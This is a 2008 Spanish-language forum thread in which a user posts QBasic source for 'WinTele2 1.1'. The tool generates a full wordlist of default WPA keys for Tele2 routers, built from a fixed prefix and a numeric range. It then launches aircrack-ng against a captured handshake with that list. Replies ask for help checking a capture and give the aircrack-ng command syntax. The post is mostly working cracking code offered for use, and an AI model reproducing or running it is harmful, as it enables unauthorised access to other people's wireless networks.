Online



Board Stats

  • stats Total de Usuarios: 9124
  • stats Total de Mensajes: 58359
  • stats Total de Temas: 6609
  • stats Total de Categorías: 13
  • stats Total de Foros: 76
  • stats Máx. usuarios conectados (simultáneamente): 266

Ultimo registro

Top Poster

lampi lampi
20131 Mensajes
maripuri maripuri
13472 Mensajes
kcdtv kcdtv
2468 Mensajes
erborricobueno erborricobueno
1934 Mensajes
betis-jesus betis-jesus
1479 Mensajes

Recursos











Autor Tema: Codigo Fuente de WinTele2 1.1 para las nuevas WpA  (Leído 3201 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado lampi

  • Usuario
  • Mensajes: 20131
  • ViladeCans
Codigo Fuente de WinTele2 1.1 para las nuevas WpA
« en: Julio 03, 2008, 22:47:07 pm »
Yo ya me lo se hace tiempo.  :D

Codigo Fuente de WinTele2 1.1 para las nuevas WpA

CLS : COLOR 15
cl$ = COMMAND$ + "!": l = LEN(cl$)
po = 1: x = 1
ext:
FOR i = 0 + po TO l
c$ = MID$(cl$, i, 1)
IF c$ = "!" THEN GOTO sal
IF c$ = " " THEN po = po + 1: x = x + 1: GOTO ext
a$(x) = a$(x) + c$
po = po + 1
NEXT: x = x + 1: GOTO ext
sal:
tel$ = "IX1VPV": a = VAL(a$(1))
GOSUB inicio
IF a <= 0 OR a > 9 OR a$(1) = "?" THEN GOTO info
PRINT "Generando diccionario para "; tel$; a$(1); " "; TIME$
ini$ = a$(1) + "000000": fin$ = a$(1) + "999999"
ini = VAL(ini$): fin = VAL(fin$)
OPEN "wtele2.lst" FOR OUTPUT AS #1
FOR x = ini TO fin
b$ = LTRIM$(STR$(x))
c$ = tel$ + b$
PRINT #1, c$
NEXT x
CLOSE #1
COLOR 10: PRINT "Terminado: "; TIME$: SLEEP (1)
PRINT : COLOR 15
PRINT "Lanzando aircrack.ng - "; a$(2)
air$ = "cmd.exe /C aircrack-ng -a 2 -w wtele2.lst " + a$(2)
SHELL air$
COLOR 15: PRINT : PRINT "Eliminando diccionario."
SHELL "del wtele2.lst"
COLOR 10: PRINT "Terminado."
a$ = INPUT$(1)
END
inicio:
PRINT "WinTele2 v1.1"
PRINT "-------------"
PRINT "Powered by LAMPI -
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
(2008)"
RETURN
salir:
PRINT : PRINT "Usage: wtele2 x .cap"
a$ = INPUT$(1): END
info:
PRINT : PRINT "Ayuda:": PRINT "------"
PRINT "Uso: wtele2 x f.cap"
PRINT "x numero de patron"
PRINT "f.cap fichero cap con al menos 1 handshake."
PRINT "Actualmente para las nuevas tele2 llevan el patr¢n IX1VPVx6"
END
« última modificación: Julio 03, 2008, 22:56:44 pm por lampi »

Desconectado javier1990

  • Usuario
  • *
  • Mensajes: 93
Re:Codigo Fuente de WinTele2 1.1 para las nuevas WpA
« Respuesta #1 en: Junio 25, 2011, 17:57:16 pm »
hola me gustria si alguien me puede comprobar el cap que he conseguido de tele2.

Desconectado maripuri

  • Moderador Global
  • Usuario
  • *****
  • Mensajes: 13472
  • Mari
    • WirelessWindows
Re:Codigo Fuente de WinTele2 1.1 para las nuevas WpA
« Respuesta #2 en: Junio 25, 2011, 18:22:25 pm »
@javier1990


sintaxis: aircrack-ng  *.cap    (ver.0.93 mejor)

Esto comprobará si has capturado el handshake, luego tienes un montón de herramientas y GUI's por el foro para hacerlo tu mismo, no hace falta que te lo compruebe nadie.
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.